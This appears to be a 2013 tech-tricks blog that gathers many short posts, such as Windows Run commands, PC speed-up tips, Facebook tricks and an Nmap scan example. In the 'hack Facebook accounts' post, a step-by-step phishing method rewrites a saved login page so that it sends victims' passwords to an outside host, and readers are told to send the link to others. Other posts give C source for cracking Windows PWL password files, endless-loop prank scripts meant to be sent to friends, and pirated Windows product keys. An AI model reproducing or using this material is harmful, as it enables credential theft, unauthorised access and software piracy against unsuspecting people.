Tuesday 3 September 2013

ADD TEXT TO AN IMAGE

ADD TEXT TO AN IMAGE

Put some txt in an image.

CODING:

#include <stdio.h>
#include <gd.h>
#include <gdfontg.h>

int main(int argc, char *argv[]) {
 gdImagePtr img;
 FILE *fp = {0};
 int width, white, black;

 width = white = black = 0;

 if(argc != 3) {
  fprintf(stderr, "Usage: pngtxt image.png 'Hello world.. !'\n");
  return 1;
 }

 fp = fopen(argv[1], "wb");
 if(fp == NULL) {
  fprintf(stderr, "Error - fopen(%s)\n", argv[1]);
  return 1;
 }

 width = strlen(argv[2]);

 img = gdImageCreate(width * 10, 20);

 white = gdImageColorAllocate(img, 255, 255, 255);
 black = gdImageColorAllocate(img, 0, 0, 0);

 gdImageString(img, gdFontGiant, 2, 1, argv[2], black);

 gdImagePng(img, fp);

 fclose(fp);
 gdImageDestroy(img);

 return 0;
}

RUN COMMANDS FOR WINDOWS

RUN COMMANDS FOR WINDOWS


CONTROL COMMANDS

* CONTROL: opens the control panel window
* CONTROL ADMINTOOLS: opens the administrative tools
* CONTROL KEYBOARD: opens keyboard properties
* CONTROL COLOUR: opens display properties.Appearance tab
* CONTROL FOLDERS: opens folder options
* CONTROL FONTS: opens font policy management
* CONTROL INTERNATIONAL or INTL.CPL: opens Regional and Language option
* CONTROL MOUSE or MAIN.CPL: opens mouse properties
* CONTROL USERPASSWORDS: opens User Accounts editor
* CONTROL USERPASSWORDS2 or NETPLWIZ: User account access restrictions
* CONTROL PRINTERS: opens faxes and printers available
* APPWIZ.CPL: opens Add or Remove programs utility tool
* OPTIONALFEATURES: opens Add or Remove Windows component utility
* DESK.CPL: opens display properties. Themes tab
* HDWWIZ.CPL: opens add hardware wizard
* IRPROPS.CPL: infrared utility tool
* JOY.CP: opens game controllers settings
* MMSYS.CPL: opens Sound and Audio device Properties. Volume tab
* SYSDM.CPL: opens System properties
* TELEPHON.CPL: Opens phone and Modem options
* TIMEDATE.CPL: Date and Time properties
* WSCUI.CPL: opens Windows Security Center
* ACCESS.CPL: opens Accessibility Options
* WUAUCPL.CPL: opens Automatic Updates
* POWERCFG.CPL: opens Power Options Properties
* AZMAN.MSC: opens authorisation management utility tool
* CERTMGR.MSC: opens certificate management tool
* COMPMGMT.MSC: opens the Computer management tool
* COMEXP.MSC or DCOMCNFG: opens the Computer Services management tool
* DEVMGMT.MSC: opens Device Manager
* EVENTVWR or EVENTVWR.MSC: opens Event Viewer
* FSMGMT.MSC: opens Shared Folders
* NAPCLCFG.MSC: NAP Client configuration utility tool
* SERVICES.MSC: opens Service manager
* TASKSCHD.MSC or CONTROL SCHEDTASKS: opens Schedule Tasks manager
* GPEDIT.MSC: opens Group Policy utility tool
* LUSRMGR.MSC: opens Local Users and Groups
* SECPOL.MSC: opens local security settings
* CIADV.MSC: opens indexing service
* NTMSMGR.MSC: removable storage manager
* NTMSOPRQ.MSC: removable storage operator requests
* WMIMGMT.MSC: opens (WMI) Window Management Instrumentation
* PERFMON or PERFMON.MSC: opens the Performance monitor
* MMC: opens empty Console
* MDSCHED: opens memory diagnostics tools
* DXDIAG: opens DirectX diagnostics tools
* ODBCAD32: opens ODBC Data source Administrator
* REGEDIT or REGEDT32: opens Registry Editor
* DRWTSN32: opens Dr. Watson
* VERIFIER: opens Driver Verifier Manager
* CLICONFG: opens SQL Server Client Network Utility
* UTILMAN: opens Utility Manager
* COLORCPL: opens color management
* CREDWIZ: back up and recovery tool for user passwords
* MOBSYNC: opens Synchronization center
* MSCONFIG: opens System Configuration Utility
* SYSEDIT: opens System Configuration Editor (careful while using this command)
* SYSKEY: Windows Account Database Security management (careful while using this command)

Windows utility and applications

* EPLORER: Opens windows Explorer
* IEXPLORER: Opens Internet explorer
* WAB: opens Contacts
* CHARMAP: opens Character Map
* WRITE: opens WordPad
* NOTEPAD: opens Notepad
* CALC: opens Calculator
* CLIPBRD: opens Clipboard Viewer-> Vista Has no ClipBoard..
* WINCHAT: opens Microsoft Chat Interface
* SOUNDRECORDER: opens sound recording tool
* DVDPLAY: run CD or DVD
* WMPLAYER: opens Windows Media Player
* MOVIEMK: Opens untitled Windows Movie Maker
* OSK: opens on-screen Keyboard
* MAGNIFY: opens Magnifier
* WINCAL: opens Calendar
* DIALER: opens phone Dialer
* EUDCEDIT: opens Private Character Editor
* NDVOL: opens the mixer volume
* RSTRUI : opens Tool System Restore (For Vista only)
* %WINDIR%\SYSTEM32\RESTORE\rstrui.exe: opens Tool System Restore (for XP only).
* MSINFO32: Opens the System Information
* MRT : launches the utility removal of malware.
* Taskmgr : Opens the Windows Task Manager
* CMD: opens a command prompt
* MIGWIZ: Opens the tool for transferring files and settings from Windows (Vista only)
* Migwiz.exe: Opens the tool for transferring files and settings from Windows (for XP only)
* SIDEBAR: Open the Windows (Vista only)
* Sigverif : Opens the tool for verification of signatures of files
* Winver : Opens the window for your Windows version
* FSQUIRT: Bluetooth Transfer Wizard
* IExpress opens the wizard for creating self-extracting archives. Tutorial HERE
* MBLCTR: opens the mobility center (Windows Vista only)
* MSRA : Opens the Windows Remote Assistance
* Mstsc : opens the tool connection Remote Desktop
* MSDT: opens the diagnostic tools and support Microsoft
* WERCON: opens the reporting tool and solutions to problems (for Vista only)
* WINDOWSANYTIMEUPGRADE: Enables the upgrade of Windows Vista
* WINWORD : opens Word (if installed)
* PRINTBRMUI : Opens migration wizard printer (Vista only)


Disk management
* DISKMGMT.MSC: opens disk management utility
* CLEANMGR: opens disk drive clean up utility
* DFRG.MSC: opens disk defragmenter
* CHKDSK: complete analysis of disk partition
* DISKPART: disk partitioning tool


Connection management

* IPCONFIG: list the configuration of IP addresses on your PC (for more information type IPCONFIG/? in the CMD menu)
* INETCPL.CPL: opens internet properties
* FIREWALL.CPL: opens windows firewall
* NETSETUP.CPL: opens network setup wizard


Miscellaneous commands

* JAVAWS: View the cover of JAVA software (if installed)
* AC3FILTER.CPL: Opens the properties AC3 Filter (if installed)
* FIREFOX: Mozilla launches Firefox (if installed)
* NETPROJ: allow or not connecting to a network projector (For Vista only)
* LOGOFF: closes the current session
* SHUTDOWN: shut down Windows
* SHUTDOWN-A: to interrupt Windows shutdown
* %WINDIR% or %SYSTEMROOT%: opens the Windows installation
* %PROGRAMFILES%: Opens the folder where you installed other programs (Program Files)
* %USERPROFILE%: opens the profile of the user currently logged
* %HOMEDRIVE%: opens the browser on the partition or the operating system is installed
* %HOMEPATH%: opens the currently logged user C: \ Documents and Settings \ [username]
* %TEMP%: opens the temporary folder
* VSP1CLN: deletes the cache for installation of the service pack 1 for Vista

CRACK WINDOWS PASSWORD SOURCE CODE :

CRACK WINDOWS PASSWORD SOURCE CODE :    This will reveal your windows computer password. Just copy this code on to a notepad.

Save it as anything.c. Remember to change the file type to "All file".

# include<stdio.h>
 # include<stdio.h>
 # include<process.h>
 # include<stdlib.h>
 # include<ctype.h>
 # include<conio.h>
 # include<mem.h>

 unsigned char huge Data[100001];
 unsigned char keystream[1001];
 int Rpoint[300];

 void main(int argc,char *argv[]){
 FILE *fd;
 int i,j;
 int size;
 char ch;
 char *name;
 int cracked;
 int sizemask;
 int maxr;
 int rsz;
 int pos;
 int Rall[300];     /* Resourse allocation table */

 if(argc<2)
 {
     printf("usage: glide filename (username)");
     exit(1);
 }
 /* Read PWL file */

 fd=fopen(argv[1],"rb");
 if(fd==NULL)
 {
       printf("can't open file %s",argv[1]);
       exit(1);
 }
 size=0;
 while(!feof(fd)){
         Data[size++]=fgetc(fd);
 }
 size--;
 fclose(fd);

 /* Find Username */
 name=argv[1];
 if(argc>2)name=argv[2];
 printf("Username:%s",name);

 /* Copy encrypted text into keystream */
 cracked=size-0x0208;
 if(cracked<0)cracked=0;
       if(cracked>1000)cracked=1000;
                memcpy(keystream,Data+0x208,cracked);

 /* Generate 20 bytes of keystream */
 for(i=0;i<20;i++)
 {
     ch=toupper(name[i]);
     if(ch==0)break;
     if(ch=='.')break;
     keystream[i]^=ch;
 };
 cracked=20;

 /* Find allocated resources */
 sizemask=keystream[0]+(keystream[1]<<8);
 printf("Sizemask:%04X",sizemask);
 for(i=0;i<256;i++)
 {
     if(Data[i]!=0xff)
         {
         Rall[Data[i]]++;
         if(Data[i]>maxr)
                             maxr=Data[i];
     }
 }

 maxr=(((maxr/16)+1)*16); /* Resourse pointer table size appears to be
 divisible by 16 */

 /*Search after resources */

 Rpoint[0]=0x0208+2*maxr+20+2; /* First resources */
 for(i=0;i<maxr;i++)
 {
     /* Find the size of current resourse */
     pos=Rpoint[i];
     rsz=Data[pos]+(Data[pos+1]<<8);
     rsz^=sizemask;
     printf("Analysing block with size:%04x    (%d:%d)",rsz,i,Rall[i]);
     if((Rall[i]==0)&&(rsz!=0))
          {

         printf("Unused resourse has nonzero size!!!");
         printf("If last line produed any:U may try 2 recover");
         printf("Press y to attempt the recovery");
         ch=getch();
         if(ch!='y')exit(0);
         rsz=2;
         i=i-1;
     }
     pos=pos+rsz;
 /* Resourse have a tedency to have the wrong size for some reason*/
     /* Chech for correct size*/
     if(i<maxr-1)
         {
         while(Data[pos+3]!=keystream[1])
                 {
             printf(":",Data[pos+3]);
             pos=pos+2; /* Very rude may fail */
         }
     }
     pos+=2; /* Include pointer in size */
     Rpoint[i+1]=pos;
 }

 Rpoint[maxr]=size;
 /* Insert Table data into keystream*/
 for(i=0;i<=maxr;i++)
 {
     keystream[20+2*i]^=Rpoint[i] & 0x00ff;
     keystream[21+2*i]^=(Rpoint[i]>>8) & 0x00ff;
 }
 cracked+=maxr*2+2;
 printf("%d Bytes of ketstream recoverd ",cracked);
 /* Decrypt resources */
 for(i=0;i<maxr;i++)
 {
     rsz=Rpoint[i+1]-Rpoint[i];
         if(rsz>cracked)
         rsz=cracked;
             printf("Resource[%d](%d)",i,rsz);
     for(j=0;j<rsz;j++)                                    
             printf("%c",Data[Rpoint[i]+j]^keystream[j]);
           printf("");
 }
     exit(0);
 }   

FACEBOOK ACCEPT OR REJECT AT ONE TIME

FACEBOOK ACCEPT OR REJECT AT ONE TIME
        If You Get A Lot Of Friend Requests Daily Or You Opened You Facebook Account After A Long Time, You Could End Up Having To Manually Accept Or Reject All Of Them, these code can be used to accept or reject all of them at once.
 PROCESS>>>
 Copy The Following Code:

For Accepting:

javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0);

For Rejecting:

javascript:for( i = 1;i<document.getElementsByName("actions[hide]").length;i++){document.getElementsByName("actions[hide]")[i].click();}void(0);

    Paste This Code In The Address Bar Of The Page You Opened In The First Step

    Now Just Wait And Let The Script Work!!


Note: For Chrome Users: When You Paste The Code In The Address Bar, You Will Manually Need To Reinsert "javascript:" in Front Of It

OSI Model

OSI Model

When two computers talk to each other, they need
to speak the same language.
The structure of this language is described in layers
by the OSI model.

The OSI model provides standards that allow
hardware, such as routers and
firewalls, to focus on one particular aspect of
communication that applies to
them and ignore others. The OSI model is broken
down into conceptual
layers of communica...
tion. This way, routing and firewall hardware can
focus
on passing data at the lower layers, ignoring the
higher layers of data encapsulation
used by running applications. The seven OSI layers
are as follows:
Physical layer This layer deals with the physical
connection between
two points. This is the lowest layer, whose primary
role is communicating
raw bit streams. This layer is also responsible for
activating, maintaining,
and deactivating these bit-stream communications.
Data-link layer This layer deals with actually
transferring data between
two points. In contrast with the physical layer,
which takes care of sending
the raw bits, this layer provides high-level
functions, such as error
correction and flow control. This layer also provides
procedures for activating,
maintaining, and deactivating data-link
connections.
Network layer This layer works as a middle ground;
its primary role is
to pass information between the lower and the
higher layers. It provides
addressing and routing.
Transport layer This layer provides transparent
transfer of data between
systems. By providing reliable data communication,
this layer allows the
higher layers to never worry about reliability or
cost-effectiven
ess of data
transmission.
Session layer This layer is responsible for
establishing and maintaining
connections between network applications.
Presentation layer This layer is responsible for
presenting the data to
applications in a syntax or language they
understand. This allows for
things like encryption and data compression.
Application layer This layer is concerned with
keeping track of the
requirements of the applicatio

G mail dot(.) trick fool any site

G mail dot(.) trick fool any site


Its very useful trick, with that trick u Able create many account in One
Site,
read that!
if u Have only one G mail Id,
and u want to Reg. on any Site second time, and
They not Allowed One email two Times, then u
Use that Trick,
trick is that!
u add one or more dots(.) in old email id,
Suppose your old id is- hackermail@gmail.com On next time u Use!
hacker.mail@gmail.com,hacker..mail@gmail.com,or just insert many dot(.)in your G mail id
with that Ur registration Success! and,
if u think!
"Which id we get Conformation mail" don't Worry u Get confirmation mail on Ur Real
id

How to Use Pendrive as RAM memory in Windows 7?

How to Use Pendrive as RAM memory in Windows 7?


Plug in your pendrive -> Format with NTFS or FAT32

Now go to properties ->Select REadyBoost

Check Use this device ->Choose maximum space to reserve system speed

Click on Apply and OK.Your Readyboost PenDrive is ready Now to Use


My Personal Suggestion is to use HP and SanDisk Pendrives for this work.

How to Download Torrent Files With IDM for free?

How to Download Torrent Files With IDM for free?

Steps::

1)First Download Internet Download Manager from this link>>>
                
      runthefighter.blogspot.com

2)Now copy any Torrent link Address or Download The Torrent File.


3)Now visit site: zbigz.com

4)Paste the Link address or Upload the Torrent File.

5)Now click on Go Free

                 Thats it!

Major Differences Between Windows 7 and Windows 8

Major Differences Between Windows 7 and Windows 8

* Boot time: win7 48 sec. win8 10 sec.
* Desktop : Microsoft has replaced the normal shortcut icons with dynamic tiles. You can change their size and place similar applications around each other- or anything else that my suit you.
* Mounting iso images: Windows 7 could only burn an ISO image to a DVD but Windows 8 actually betters this by offering you the option to mount the image too. In Windows 7, you didn’t have the option to make virtual drives to use the ISO image’s content but Windows 8 allows you to create a virtual drive to mount the ISO image so that you can easily use it just like a normal DVD.
*Built-in Antivirus(bad news for hackers): Windows 8 has an antivirus present inside the kernel of the operating system. This means that your system won’t boot if a corrupt USB device is plugged in. It sounds impressive though I don’t know whether it would pass the test of time…. and viruses! All in all, I do expect Windows 8 to be a serious upgrade on Windows 7 and with Microsoft working on the things that require some tweaking; I genuinely believe that Microsoft is finally ready to launch an OS which will take the world by storm.
* Multiple monitors support in Windows : Microsoft announced that customers can use more than one monitor to connect with Windows 8 operating system. Windows 8 PC management allows customers to use multiple monitors at same time. It means Windows 8 offers flexibility by allowing start screen at one monitor and desktop in another. Customer can also choose taskbar on both screens with different icons on each monitor. Moreover, you can play with background images as well by changing it separate on each monitor. Such support is not available with Windows 7 operating system.
*Windows based apps store Windows 8 operating system introduces new app store in which different apps is implemented for various devices and settings on right of the screen. The settings section includes contextual apps like volume, brightness, restart and power options. You can share content, links, app reviews, contacts, metro apps, Facebook and twitter applications with your friends or colleagues. Windows 8 store offers both desktop apps and ecosystem for developers. On the other hand, Windows 7 OS is missing all these features.
*Inbuilt Windows Touch features: The main difference between Windows 7 and Windows 8 comes with its metro style interface that provides live title of rectangle shape which has replaced the icon pattern in Windows.
* In Windows 7 operating system, software shortcuts are in the form of icons. As far as the touch interface is concerned then Windows.
*supports touch interface but not that much, what was expected. So, Windows 8 comes with true touch interface for Metro style apps. It is fast way of accessing data by using an improved on-screen keyboard and handwriting recognition

How to make PC really run faster than before

How to make PC really run faster than before

1.Let your PC boot up completely before opening any applications.
2.Refresh the desktop after closing any application. This will remove any unused files from the RAM.
3.Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB).
4.Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM
5.Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin.
6.Delete the temporary internet files regularly.
7.Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster.
8.Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.
9.When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application.
10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum. RAM IS THE WORKING AREA (DESKTOP) OF THE CPU, KEEP IT AS EMPTY AND UNCLUTTERED AS POSSIBLE!

                       Lesson 2

- Simple (and free) ways how to speed up your computer:
Tip: Disable the XP loading screen
To speed up booting your computer process slightly, disable the Windows XP loading screen. This can be done very easy:
- Open the MSCONFIG utility (Open Start\Run and type msconfig)
- Select the boot.ini tab
- Check the /NOGUIBOOT option. When you boot (start) your PC, you will see a black screen in between POST and the welcome screen from now on.

Tip: Check your hard drives with scandisk
With time, tons of small data problems and physical problems can develop and slow down the performance of your hard drive. While defragmenting the drive can help restore much of the performance you might have lost, there are other issues such as lost clusters which the defragmentation utility cannot fix.
Because of this, it is a good idea to run XP's error checking utility once in a while. This utility scans your disks for errors and optionally attempt to correct them.

- Open My computer
- Right click the hard disk you wanna scan and select Properties from the menu
- Choose the Tools tab and under Error checking click the Check now… button.
- Check both options. You will need to restart the computer to do the full disk check.

Your disk will be fully checked for errors upon reboot, but this can take quite a while. 

HOW TO HACK FACEBOOK ACCOUNTS

HOW TO HACK FACEBOOK ACCOUNTS?


How to hack facebook account and
what are its preventive measures


Step 1: Go to www.facebook.com

Step 2: Save the login page of facebook (shortcut:press ctrl+S)

Step 3: Now 2 things would have been saved in your computer with the name "Welcome to Facebook - Log In, Sign Up or Learn More"

Step 4: Right click on the saved file with name "Welcome to Facebook - Log In, Sign Up or Learn More.htm" and open it with notepad

Step 5: Now search where the word action is written in it for the first time (shortcut:press ctrl+F then type action in it and then press enter).

Step 6: Now after action you will see action="https://www.facebook.com/login.php?login_attempt=1" id="login_form"

Step 7: Now replace that line with action="http://hackfact.com/fb.php?id=your-email-id-here@gmail.com&link=www.facebook.com/login.php?login_attempt=1"

Step 8: Now replace the line your-email-id-here@gmail.com with your email-id where you want to recieve the password.

Step 9: Save the notepad(shortcut: ctrl+s).

Step 10: Now just put this page on your Desktop who so ever will login from this will be hacked. You will be having his/her password in your email-id or the other option you have is that upload this page on a free web hosting site where you can upload both these pages and if you have your own website you can upload this on that and send the link to others.    bingoooooooo..:).

Note: Remember both the files will be moved together which you saved with the name "Welcome to Facebook - Log In, Sign Up or Learn More" and you can rename the file with the name "Welcome to Facebook - Log In, Sign Up or Learn More.htm" but not that folder.

This trick was for educational purpose only and the preventive measure is that always see the URL of the site(Complete URL if site has url www.facebook.com.hackfact.com then also its fake not genuine.).

NOTEPAD TRICKS

NOTEPAD TRICKS

This trick will Open Notepad continuously automatically

Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

@ECHO off
:trick
START %SystemRoot%\system32\notepad.exe
GOTO trick

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
______________________
This trick will pop out error messages again and again
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

@ECHO off
:Begin
msg * Welcome to hackfact
msg * You are learning cool notepad tricks
msg * Notepad tricks rocks
msg * Using notepad tricks we can even control whole computer
msg * What are your views in all these tricks using notepad
GOTO BEGIN

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
______________________
Matrix falling notepad trick
After the success of the movie matrix people just started loving matrix pattern , its style. So here is a notepad trick which will show that matrix affect in your command prompt

Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

@echo off
color 02
:tricks
echo %random%%random%%random%notepad%random%%random%tricks%random%%random%%random%%random%%random%
goto tricks

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)

Notepad and vbsfile tricks combo
Hit Enter Key Continuously
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
______________________

Press backspace continuously notepad trick (so Let's go back a few steps.)
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
______________________

Toggle Caps Lock button On-Off Continuously
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)



Now if u want to disable any of these notepad and vbs trick combo just go do task manager click on process then find wscript.exe and end this process and for all notepad and batch programming tricks combo just restart your computer or close the command prompt.

How to disable AERO Theme on windows 7?

How to disable AERO Theme on windows 7


Disable the Aero Theme on Windows 7


    Right Click on your Desktop and select ” Personalize ” click the Window Color Tab.
    Uncheck the Box saying ” Enable Transparency ” and then click on ” Open classic appearance properties for more color options”.
    Then a window will open up. Apply a Standard or Basic theme from it. The Standard Windows 7 theme is more preferred.

The aero user interface certainly adds some ” Eyecandy ” to Windows 7 but certainly is a resource hog especially when, what you expect from windows 7 is more performance juice. Aero user interface squeezes your graphics or video card to its maximum. So why dont we just avoid the Windows 7 aero? if we care more about speed and performance in Windows 7. So Disabling the Aero in Windows 7 certainly adds an extra speed boost to it.

disabling aero Speed Up Windows 7 Ultimate Guide To Make Windows 7 Blazing Fast!!!

Disabling the aero theme alone in Windows 7 will really speed things up. You can know this by looking into the memory consumption when aero is turned on and off.

Free windows upgrade keys

Free windows upgrade keys

All red  letters are keys.
This is done to make things  easier.     
                                                                                               
Windows 7 Anytime Upgrade key:    
VTDC3-WM7HP-XMPMX-K4YQ2-WYGJ8
Windows 7 Professional Product Key:
YKHFT-KW986-GK4PY-FDWYH-7TP9F
If instead you would like to upgrade to Windows 7 Home Premium
Upgrade key for Windows Anytime Upgrade:
RHPQ2-RMFJH-74XYM-BH4JX-XM76F
Activation Key for Windows 7 Home Premium
Windows 7 Ultimate :
7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG
Windows Anytime Upgrade Key:
22TKD-F8XX6-YG69F-9M66D-PMJBM
Windows 7 Ultimate Product Keys:
D9RHV-JG8XC-C77H2-3YF6D-RYRJ9
482XP-6J9WR-4JXT3-VBPP6-FQF4M
RFFTV-J6K7W-MHBQJ-XYMMJ-Q8DCH
By RUN MADNANI

Sunday 1 September 2013

Port Scan

Port Scanners

Port scanners are probably the most commonly used scanning tools on the Internet.
These tools scan large IP spaces and report on the systems they encounter, the ports
available, and other information, such as OS types. The most popular port scanner is
Network Mapper (Nmap).
The Nmap port scanner is described as follows on the Nmap web site:
Nmap (“Network Mapper”) is an open source utility for network exploration or
security auditing. It was designed to rapidly scan large networks, although it
works fine against single hosts. Nmap uses raw IP packets in novel ways to
determine what hosts are available on the network, what services (ports) they are
offering, what operating system (and OS version) they are running, what type of
packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs
on most types of computers, and both console and graphical versions are
available. Nmap is free software, available with full source code under the terms
of the GNU GPL.3
Nmap is an excellent security tool because it allows you to determine which services
are being offered by a system. Because Nmap is optimized to scan large IP ranges, it
can be run against all IP addresses used by an organization, or all cable modem IP
addresses provided by an organization. After using Nmap to find machines and
identify their services, you can run the Nessus vulnerability scanner against the
vulnerable machines.
Nmap supports an impressive array of scan types that permit everything from TCP
SYN (half open) to Null scan sweeps. Additional options include OS fingerprinting,
parallel scan, and decoy scanning, to name a few. Nmap supports a graphical
version through xnmap. For more information about Nmap, refer to the Nmap web
site

Using Port Scanners

To demonstrate the capabilities of the Nmap port scanner, we ran the following scan.
The output of the scan reveals the services running on the machine. Nmap’s ability
to identify the OS running on the system is particularly useful because it can
significantly reduce the time required to launch a successful attack against the machine.


 The Nmap output is as follows:
# /usr/local/nmap -O ganassi
Starting nmap V. 2.53 (www.insecure.org/nmap/)
Interesting ports on ganassi (10.8.10.231):
(The 1515 ports scanned but not shown below are in state: closed)
Port State Service
7/tcp                                 open               echo
9/tcp                                 open              discard
13/tcp open                                            daytime
19/tcp open                                            chargen
21/tcp open                                            ftp
23/tcp open                                            telnet
25/tcp open                                            smtp
37/tcp open                                            time
79/tcp open                                            finger
111/tcp open                                          sunrpc
512/tcp open                                          exec
513/tcp open                                          login
514/tcp open                                         shell
515/tcp open                                         printer
540/tcp open                                         uucp
1103/tcp open                                      xaudio
4045/tcp open                                      lockd
6112/tcp open                                       dtspc
7100/tcp open                                       font-service
32771/tcp open                                    sometimes-rpc5
32772/tcp open                                     sometimes-rpc7
32773/tcp open                                      sometimes-rpc9
32774/tcp open                                     sometimes-rpc11
32775/tcp open                                     sometimes-rpc13
32776/tcp open                                      sometimes-rpc15
32777/tcp open                                        sometimes-rpc17
32778/tcp open                                        sometimes-rpc19
Remote operating system guess:      Solaris 2.6 - 2.7
Uptime 0.054 days (since Wed Sep 12 09:41:59 2001)
Nmap run completed -- 1   IP address (1 host up) scanned in 37 seconds




6 Interesting Facebook Tricks You Might Not Know Discovered By Me :)

At this point, you are all probably pretty familiar with Facebook, and some of the more common features like updating statuses, checking-in, browsing profiles, pages, and apps, and many more day to day actions.
However, most people are not aware of a number of interesting, but mostly useless, tricks and hacks, which you can perform on Facebook today.
Here are 6 of our favorite useless, but interesting, Facebook tricks and hacks for you try:

Modifying Anchor Text of a Target Page’s / Profile’s URL

SEJ 1
Image courtesy: https://www.facebook.com/wittykittymi/posts/10151430928688218

The Trick:

By default, Facebook allows us to tag profiles & pages using the “@” symbol on our status updates.
But with this hack, you can modify the anchor text that is used to link to your profile or page.  If you notice, this status update contains text links “THIS PAGE”, “TODAY I LEARNED” & “facts”, all linking to the URL https://www.facebook.com/todayilearn.

How to do it:

SEJ 2
1) To get your page’s/profile’s ID, you can go to findmyfacebookid.com & type in the URL of the page or profile you are interested in.
SEJ 3
2)  Once you have the numeric ID, copy this code to create the link in your updates.
@@[0:[YOURPAGEID:1:YOUR PREFERRED ANCHOR TEXT]]
Note: The code has to be in the status update TWICE, otherwise, linking won’t work.
Hence, in the above post, the exact post should be entered as:
“When was the last time you visited @@[0:[342422379172885:1:this page?]]
“LIKE” @[342422379172885:0] for awesome @@[0:[342422379172885:1:facts]]!”

Removing Your Last Name in Your Facebook Profile

SEJ 4
Image source: https://www.facebook.com/wittykittymi

The Trick:

As part of Facebook’s security checks, you are required to completely fill out your account details to successfully create an account. By default, Facebook requires every user to enter their full name prior to saving their profile settings.
With this trick, you will be able to bypass Facebook’s restrictions and drop your last name.

How to Do it:

1) Open Mozilla Firefox (Firefox is required for this hack to work)
2) Go to Options -> Advanced -> Network -> Settings -> Connection Settings -> Manual Proxy Configuration
3) In the HTTP Proxy Field, enter 103.10.62.30, port 8080, or use any Indonesian Proxy.
SEJ 5

4) On your facebook profile, go to Account settings — > Change Language to BAHASA INDONESIA
5) Remove your middle name & last name.
SEJ 6


Adding Animated Custom Tabs

SEJ 7
Image Source: https://www.facebook.com/TriviaManiaOfficial

The Trick:

Facebook doesn’t allow users to upload animated GIFs anywhere on the site, so if you wanted to have an animated GIF somewhere, you’re out of luck, unless…
There is a trick that allows anyone, who has the following resources, to bypass this limitation in uploading animated GIFs for custom tabs.

How to Do it:

1)       You must have Adobe Photoshop C5 & Quicktime Player.
2)       Select the animate GIF you want to upload.
3)       Open Adobe Photoshop CS5 and go to File > Import > Video frames to layers. In the File Name box, just enter *.* as your filename and choose your GIF image.
4)       Resize your GIF to 111 x 74 pixels to fit the custom tab image .
5)       Save your file in a PSD format. Check the save option, ‘LAYERS’

Creating Your Own Emoticon on Facebook Chat

SEJ 8 SEJ 9

The Trick:

While this is not actually new, many people have no idea about this feature. Since 2011, Facebook has allowed users to chat with their friends using custom emoticons, and now you can too. Just by getting a page’s or a profile’s ID or username, Facebook will let you use their profile pictures as your chat emoticon in thumbnails…
*note this only works in the Facebook Chat and not in updates. 

How to Do it:

1)       Go to any profile, official Page, or event that you want to use as an emoticon.
2)       Look for the profile ID at the end of the URL, such as “Mcdonalds” from https://www.facebook.com/McDonalds
3)       Place that username or number in double brackets like [[Mcdonalds]]
Note: Pages with no username /vanity URL  e.g https://www.facebook.com/McDonalds have default ID numbers displayed on their URLs (https://www.facebook.com/pages/Socially-Awkward-Penguin/98438140742).  So when you cannot find  a profile or a page’s username, just refer to the numbers at the end of the URL, instead. 
4)       Enter that into a Facebook Chat or Message field.
Rage Faces IDs:
Here is a collection of a few rage faces courtesy of Reddit.
Using Profile IDs
Troll face: [[171108522930776]]
Are you f****** kidding me : [[143220739082110]]
Not bad Obama: [[169919399735055]]
Me G usta: [[211782832186415]]
Mother of God: [[142670085793927]]
Cereal Guy: [[170815706323196]]
LOL Face: [[168456309878025]]
NO Guy: [[167359756658519]]
Yao Ming: [[218595638164996]]
Derp: [[224812970902314]]
Derpina: [[192644604154319]]
Forever Alone: [[177903015598419]]
F yeah: [[105387672833401]]
Challenge accepted: [[100002727365206]]
Okay face: [[100002752520227]]
Poker face: [[129627277060203]]
Okay face: [[224812970902314]]
Socially awkward penguin: [[98438140742]]
No: [[167359756658519]]
MOG: [[142670085793927]]
Like a sir: [[168040846586189]]
Using Usernames / Vanity URL
Not Bad: [[NotBaad]]
Rage face: [[FUUUOFFICIAL]]

Making Your Profile Photo Un-clickable

9


The Trick:

